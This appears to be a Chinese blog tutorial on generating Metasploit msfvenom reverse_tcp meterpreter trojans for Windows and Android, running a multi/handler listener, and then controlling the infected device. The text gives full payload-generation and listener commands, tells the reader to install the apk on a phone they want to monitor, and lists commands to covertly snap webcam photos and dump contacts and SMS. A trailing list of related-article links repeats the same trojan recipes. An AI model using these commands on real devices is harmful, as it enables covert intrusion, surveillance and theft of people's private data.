简介

msfvenom

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件

查看所有–payload的模块

msfvenom -l payloads

文件后缀名-f的格式

msfvenom --help-formats

metasploit

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

生成的木马是前端的话,那么这个就是后端

msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140
lport=1211 -f exe > /root/shell.exe

启动metasploit

输入命令:

msfconsole

metasploit侦听

msf > use exploit/multi/handler #加载模块 msf exploit(multi/handler) >
set payload windows/meterpreter/reverse_tcp #设置payload payload =>
windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost
kali的ip #设置kali的ip lhost => 192.168.152.131 msf
exploit(multi/handler) > set lport 1211 #设置kali的端口 lport => 1211 msf
exploit(multi/handler) > exploit #执行 [*] Started reverse TCP handler
on 222.222.221.140:1211

将生成的shell上传至windows主机中并运行

提示有返回即可控制对方电脑,如同操作linux服务器一样

使用

? - 帮助菜单

download -下载文件/文件夹

msfvenom的apk在android中的使用

msfvenom生成shell.apk

ifconfig查看kali的ip,ip为222.222.221.140

输入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555
R > /root/apk.apk

这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小

启动metasploit
输入命令:

msfconsole

启动msfconsole

metasploit配置及监听

在控制台中输入

use exploit/multi/handler //加载模块

set payload android/meterpreter/reverse_tcp //选择Payload

show options //查看参数设置

这里需要设置LHOST的ip地址,也就是你的kali的ip地址

还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的)

set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址(kali的ip)

set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

exploit //开始执行漏洞 开始监听,等待手机上线

接下来就要把生成的apk装在你想监控的手机上了,等待手机上线了


使用
然后可以输入sysinfo 查看手机信息

webcam_list 查看手机有多少个摄像头 这里显示是2个

webcam_stream //开启摄像头

webcam_snap //隐秘拍照功能


dump_contacts //导出电话号码


dump_sms //导出信息


导出的文件拍的照片都会在root下面

可以输入?查看更多命令

session切换 background #后台运行当前
session sessions #列出所有session
sessions -i Id #选择某一个sessionID进入
session sessions -n Name -i Id #给session重命名

参考:https://blog.csdn.net/langtuteng17/article/details/80444115

metasploit、msfvenom生成木马入侵电脑及手机相关推荐

  1. 使用Kali linux生成木马入侵局域网安卓手机

    1.首先查看本机ip,这里我本机IP地址为192.168.0.105 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip ...

  2. msfvenom生成木马的简单利用

    msfvenom生成木马的简单利用 1.简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10. 2.实 ...

  3. 使用msfvenom生成木马用于监听别人的操作

    ss msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用& ...

  4. msfvenom生成木马和内网穿透

    msfvenom命令行选项如下: 英文原版 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的pay ...

  5. msfvenom生成木马攻击-Windows10实现自己黑自己

    简介: 昨天看赛题的时候,发现了一个生成"木马",学一下,来做个笔记. 没有想到msf竟然有一个,可以生成木马的工具,msfvenom. 本文用 # 作为注释. 测试环境: 攻击机 ...

  6. msfvenom生成木马利用

    一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题. 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来 ...

  7. 利用msfvenom生成木马文件反弹shell

    目录 1.安装靶机和攻击机 2.利用生成木马文件 3.msf里面开启监听 4.攻击成功且利用 5.meterpreter简单系统命令 1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSD ...

  8. 手机android.sys木马,使用kali生成木马入侵安卓手机

    大家好,我是T0reAd 今天给大家带来的是使用kali生成 行动开始 先查看kali的ip,我的是1.114 然后输入命令:msfvenom -p android/meterpreter/rever ...

  9. Metasploit 之生成木马(msfvenom)

    msfvenom参数 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块 ...

  10. kali生成后门远程控制电脑或手机

    一.复现环境 Kali平台(Hack):192.168.25.128 靶机:192.168.25.106 Android模拟器(靶机1):192.168.25.106 注意,手机端控制必须使手机和 ...

最新文章

  1. 深度学习---TensorFlow学习笔记:搭建CNN模型
  2. SCI期刊上发现大量辣眼学术名词,用机翻规避抄袭,作者主要来自中国
  3. SVN如何将版本库url访问地址中的https改为http
  4. C++生成指定范围内的随机数
  5. Effective Java~35. 用实例域代替序数
  6. 烂代码解决方案:Java设计模式的魅力
  7. Nginx的Gzip介绍之压缩和解压缩
  8. Spark学习笔记:索引分区映射
  9. c++ protected_java基础之——访问修饰符(private/default/protected/public)
  10. 柳暗花明 | 海归小硕的求职之路
  11. Linux笔记(五) - 用户管理命令
  12. 数学手册|赋范空间概念
  13. 联想7400一体机加粉后粉盒重置归零方法
  14. 韩昊 20190919-5 代码规范,结对
  15. 我的世界血量显示的服务器,Minecraft|世纪之都|服务器mod:拔刀剑 工业2 高级太阳能 血量显示 Nei 聊天泡泡等...
  16. 接口文档系统 - Yapi
  17. 51nod 1423 最大“二货”【单调栈】
  18. 异步爬取有道词典(入门js逆向)
  19. STM32+华为云IOT制作酒驾监控系统:上车就监控
  20. MySQL 数据库的基本操作

热门文章

  1. 【阿里云生活物联网架构师专题 ③】esp32 sdk 直连接入天猫精灵IOT开放平台,实现天猫精灵找队友零配网功能和语音控制;
  2. PB调用WebService
  3. 解决AD13不能复制原理图的问题
  4. PW4052锂电池充电管理芯片2.5A 单节(多并)锂 电池充电管理
  5. 有没有可以搜索python程序的软件-有哪些可以搜Python题答案的APP
  6. 字节教育开辟新业务线,推出“闪电搜题”App可拍题和自习
  7. 从哥尼斯堡“七桥问题”到盖洛普“优势识别器”
  8. NPN三极管导通数据总结
  9. 使用飞桨一步步实现多语言OCR文字识别软件
  10. 【树莓派】USB摄像头+python+opencv